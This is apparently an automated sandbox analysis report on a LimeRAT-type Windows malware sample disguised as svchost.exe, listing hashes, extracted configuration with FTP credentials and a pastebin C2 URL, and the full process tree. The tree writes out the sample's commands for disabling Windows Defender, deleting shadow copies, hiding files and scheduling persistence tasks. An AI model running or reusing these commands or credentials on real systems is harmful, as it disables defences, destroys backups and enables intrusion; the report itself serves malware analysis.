Analysis
-
max time kernel
194s -
max time network
196s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
19-06-2024 22:02
Behavioral task
behavioral1
Sample
svchost.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
svchost.exe
Resource
win10v2004-20240611-en
General
-
Target
svchost.exe
-
Size
242KB
-
MD5
05e991bcf019b487f7ad4e896c77e988
-
SHA1
f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a
-
SHA256
cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196
-
SHA512
4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3
-
SSDEEP
6144:GpCE/UVPy/oCa+LDZWC9z5B0bmknq1difFN:6CzPygCa+DZ+nq1cT
Malware Config
Extracted
Protocol: ftp- Host:
ftp.encompossoftware.com - Port:
21 - Username:
remoteuser - Password:
Encomposx99
Extracted
limerat
False
-
aes_key
1
-
antivm
false
-
c2_url
https://pastebin.com/raw/GfV4LBjE
-
download_payload
true
-
install
true
-
install_name
svchost.exe
-
main_folder
False
-
payload_url
True
-
pin_spread
true
-
sub_folder
False
-
usb_spread
false
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/2324-0-0x0000021B31B70000-0x0000021B31BB2000-memory.dmp disable_win_def behavioral1/files/0x001500000001ac69-562.dat disable_win_def -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" svchost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" svchost.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" svchost.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" svchost.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 1 IoCs
pid Process 2968 svchost.exe -
Enumerates connected drives 3 TTPs 15 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 19 pastebin.com 2 iplogger.org 3 iplogger.org 10 pastebin.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
pid Process 4228 cmd.exe 4112 cmd.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.
-
Interacts with shadow copies 3 TTPs 12 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4132 vssadmin.exe 1308 vssadmin.exe 4432 vssadmin.exe 2912 vssadmin.exe 4984 vssadmin.exe 1248 vssadmin.exe 4936 vssadmin.exe 4972 vssadmin.exe 1396 vssadmin.exe 4696 vssadmin.exe 4248 vssadmin.exe 4528 vssadmin.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5176 schtasks.exe 5424 schtasks.exe 4536 schtasks.exe 6128 schtasks.exe 5220 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2324 svchost.exe 2324 svchost.exe 2324 svchost.exe 5016 powershell.exe 5016 powershell.exe 5016 powershell.exe 2396 powershell.exe 2396 powershell.exe 2396 powershell.exe 2396 powershell.exe 2396 powershell.exe 5100 powershell.exe 4272 powershell.exe 5100 powershell.exe 4272 powershell.exe 768 powershell.exe 768 powershell.exe 5100 powershell.exe 4272 powershell.exe 3156 powershell.exe 3156 powershell.exe 3156 powershell.exe 768 powershell.exe 4180 powershell.exe 4180 powershell.exe 4180 powershell.exe 2932 powershell.exe 2932 powershell.exe 5012 powershell.exe 5012 powershell.exe 4036 powershell.exe 4036 powershell.exe 5012 powershell.exe 4992 powershell.exe 4992 powershell.exe 4036 powershell.exe 1700 powershell.exe 1700 powershell.exe 4992 powershell.exe 3856 powershell.exe 3856 powershell.exe 5100 powershell.exe 2932 powershell.exe 1700 powershell.exe 4272 powershell.exe 3856 powershell.exe 4180 powershell.exe 3156 powershell.exe 768 powershell.exe 5012 powershell.exe 4036 powershell.exe 4992 powershell.exe 3856 powershell.exe 2932 powershell.exe 1700 powershell.exe 2968 svchost.exe 2968 svchost.exe 2968 svchost.exe 2968 svchost.exe 2968 svchost.exe 2968 svchost.exe 2968 svchost.exe 2968 svchost.exe 2968 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2324 svchost.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeIncreaseQuotaPrivilege 5016 powershell.exe Token: SeSecurityPrivilege 5016 powershell.exe Token: SeTakeOwnershipPrivilege 5016 powershell.exe Token: SeLoadDriverPrivilege 5016 powershell.exe Token: SeSystemProfilePrivilege 5016 powershell.exe Token: SeSystemtimePrivilege 5016 powershell.exe Token: SeProfSingleProcessPrivilege 5016 powershell.exe Token: SeIncBasePriorityPrivilege 5016 powershell.exe Token: SeCreatePagefilePrivilege 5016 powershell.exe Token: SeBackupPrivilege 5016 powershell.exe Token: SeRestorePrivilege 5016 powershell.exe Token: SeShutdownPrivilege 5016 powershell.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeSystemEnvironmentPrivilege 5016 powershell.exe Token: SeRemoteShutdownPrivilege 5016 powershell.exe Token: SeUndockPrivilege 5016 powershell.exe Token: SeManageVolumePrivilege 5016 powershell.exe Token: 33 5016 powershell.exe Token: 34 5016 powershell.exe Token: 35 5016 powershell.exe Token: 36 5016 powershell.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 4272 powershell.exe Token: SeDebugPrivilege 5100 powershell.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeIncreaseQuotaPrivilege 2396 powershell.exe Token: SeSecurityPrivilege 2396 powershell.exe Token: SeTakeOwnershipPrivilege 2396 powershell.exe Token: SeLoadDriverPrivilege 2396 powershell.exe Token: SeSystemProfilePrivilege 2396 powershell.exe Token: SeSystemtimePrivilege 2396 powershell.exe Token: SeProfSingleProcessPrivilege 2396 powershell.exe Token: SeIncBasePriorityPrivilege 2396 powershell.exe Token: SeCreatePagefilePrivilege 2396 powershell.exe Token: SeBackupPrivilege 2396 powershell.exe Token: SeRestorePrivilege 2396 powershell.exe Token: SeShutdownPrivilege 2396 powershell.exe Token: SeDebugPrivilege 2396 powershell.exe Token: SeSystemEnvironmentPrivilege 2396 powershell.exe Token: SeRemoteShutdownPrivilege 2396 powershell.exe Token: SeUndockPrivilege 2396 powershell.exe Token: SeManageVolumePrivilege 2396 powershell.exe Token: 33 2396 powershell.exe Token: 34 2396 powershell.exe Token: 35 2396 powershell.exe Token: 36 2396 powershell.exe Token: SeDebugPrivilege 3156 powershell.exe Token: SeDebugPrivilege 4180 powershell.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeDebugPrivilege 4036 powershell.exe Token: SeDebugPrivilege 4992 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 3856 powershell.exe Token: SeIncreaseQuotaPrivilege 4272 powershell.exe Token: SeSecurityPrivilege 4272 powershell.exe Token: SeTakeOwnershipPrivilege 4272 powershell.exe Token: SeLoadDriverPrivilege 4272 powershell.exe Token: SeSystemProfilePrivilege 4272 powershell.exe Token: SeSystemtimePrivilege 4272 powershell.exe Token: SeProfSingleProcessPrivilege 4272 powershell.exe Token: SeIncBasePriorityPrivilege 4272 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe 3560 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2324 wrote to memory of 4228 2324 svchost.exe 74 PID 2324 wrote to memory of 4228 2324 svchost.exe 74 PID 4228 wrote to memory of 3852 4228 cmd.exe 76 PID 4228 wrote to memory of 3852 4228 cmd.exe 76 PID 4228 wrote to memory of 4672 4228 cmd.exe 77 PID 4228 wrote to memory of 4672 4228 cmd.exe 77 PID 2324 wrote to memory of 5016 2324 svchost.exe 78 PID 2324 wrote to memory of 5016 2324 svchost.exe 78 PID 2324 wrote to memory of 4180 2324 svchost.exe 81 PID 2324 wrote to memory of 4180 2324 svchost.exe 81 PID 2324 wrote to memory of 2396 2324 svchost.exe 82 PID 2324 wrote to memory of 2396 2324 svchost.exe 82 PID 2324 wrote to memory of 768 2324 svchost.exe 83 PID 2324 wrote to memory of 768 2324 svchost.exe 83 PID 2324 wrote to memory of 4272 2324 svchost.exe 86 PID 2324 wrote to memory of 4272 2324 svchost.exe 86 PID 2324 wrote to memory of 3156 2324 svchost.exe 89 PID 2324 wrote to memory of 3156 2324 svchost.exe 89 PID 2324 wrote to memory of 5100 2324 svchost.exe 91 PID 2324 wrote to memory of 5100 2324 svchost.exe 91 PID 2324 wrote to memory of 2932 2324 svchost.exe 93 PID 2324 wrote to memory of 2932 2324 svchost.exe 93 PID 2324 wrote to memory of 5012 2324 svchost.exe 94 PID 2324 wrote to memory of 5012 2324 svchost.exe 94 PID 2324 wrote to memory of 4992 2324 svchost.exe 97 PID 2324 wrote to memory of 4992 2324 svchost.exe 97 PID 2324 wrote to memory of 4036 2324 svchost.exe 99 PID 2324 wrote to memory of 4036 2324 svchost.exe 99 PID 2324 wrote to memory of 1700 2324 svchost.exe 101 PID 2324 wrote to memory of 1700 2324 svchost.exe 101 PID 2324 wrote to memory of 3856 2324 svchost.exe 102 PID 2324 wrote to memory of 3856 2324 svchost.exe 102 PID 2324 wrote to memory of 1876 2324 svchost.exe 105 PID 2324 wrote to memory of 1876 2324 svchost.exe 105 PID 2324 wrote to memory of 4164 2324 svchost.exe 106 PID 2324 wrote to memory of 4164 2324 svchost.exe 106 PID 2324 wrote to memory of 3216 2324 svchost.exe 107 PID 2324 wrote to memory of 3216 2324 svchost.exe 107 PID 2324 wrote to memory of 3440 2324 svchost.exe 108 PID 2324 wrote to memory of 3440 2324 svchost.exe 108 PID 2324 wrote to memory of 2896 2324 svchost.exe 109 PID 2324 wrote to memory of 2896 2324 svchost.exe 109 PID 2324 wrote to memory of 1580 2324 svchost.exe 110 PID 2324 wrote to memory of 1580 2324 svchost.exe 110 PID 2324 wrote to memory of 3044 2324 svchost.exe 111 PID 2324 wrote to memory of 3044 2324 svchost.exe 111 PID 2324 wrote to memory of 4576 2324 svchost.exe 112 PID 2324 wrote to memory of 4576 2324 svchost.exe 112 PID 2324 wrote to memory of 2056 2324 svchost.exe 113 PID 2324 wrote to memory of 2056 2324 svchost.exe 113 PID 2324 wrote to memory of 2988 2324 svchost.exe 114 PID 2324 wrote to memory of 2988 2324 svchost.exe 114 PID 2324 wrote to memory of 1988 2324 svchost.exe 115 PID 2324 wrote to memory of 1988 2324 svchost.exe 115 PID 2324 wrote to memory of 1956 2324 svchost.exe 116 PID 2324 wrote to memory of 1956 2324 svchost.exe 116 PID 2324 wrote to memory of 2404 2324 svchost.exe 117 PID 2324 wrote to memory of 2404 2324 svchost.exe 117 PID 3440 wrote to memory of 4132 3440 cmd.exe 131 PID 3440 wrote to memory of 4132 3440 cmd.exe 131 PID 1988 wrote to memory of 4972 1988 cmd.exe 133 PID 1988 wrote to memory of 4972 1988 cmd.exe 133 PID 4576 wrote to memory of 1396 4576 cmd.exe 132 PID 4576 wrote to memory of 1396 4576 cmd.exe 132 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Run svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Run\svchost.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Branding\\svchost.exe" svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 5956 attrib.exe 1980 attrib.exe 3852 attrib.exe 4672 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2324 -
C:\Windows\SYSTEM32\cmd.execmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4228 -
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"3⤵
- Views/modifies file attributes
PID:3852
-
-
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D3⤵
- Views/modifies file attributes
PID:4672
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin Delete Shadows /all /quiet2⤵PID:1876
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4696
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB2⤵PID:4164
-
C:\Windows\system32\vssadmin.exevssadmin resize shadow /for=c: /on=c: /maxsize=401MB3⤵PID:4472
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵PID:3216
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2912
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4132
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵PID:2896
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1248
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵PID:1580
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4936
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵PID:3044
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4984
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1396
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵PID:2056
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4528
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵PID:2988
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4432
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4972
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵PID:1956
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4248
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c Vssadmin delete shadowstorage /all /quiet2⤵PID:2404
-
C:\Windows\system32\vssadmin.exeVssadmin delete shadowstorage /all /quiet3⤵
- Interacts with shadow copies
PID:1308
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "06:49" /sc daily /mo "5" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"2⤵
- Scheduled Task/Job: Scheduled Task
PID:6128
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "01:25" /sc daily /mo "3" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5220
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "07:56" /sc daily /mo "3" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5176
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "23:09" /sc weekly /mo "4" /d "Mon" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5424
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "08:19" /sc monthly /m " jul" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"2⤵
- Scheduled Task/Job: Scheduled Task
PID:4536
-
-
C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"2⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:2968 -
C:\Windows\SYSTEM32\cmd.execmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D3⤵
- Hide Artifacts: Hidden Files and Directories
PID:4112 -
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"4⤵
- Views/modifies file attributes
PID:5956
-
-
C:\Windows\system32\attrib.exeattrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D4⤵
- Views/modifies file attributes
PID:1980
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:5492
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3560
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1Hide Artifacts
4Hidden Files and Directories
4Impair Defenses
2Disable or Modify Tools
2Indicator Removal
2File Deletion
2Modify Registry
6Replay Monitor
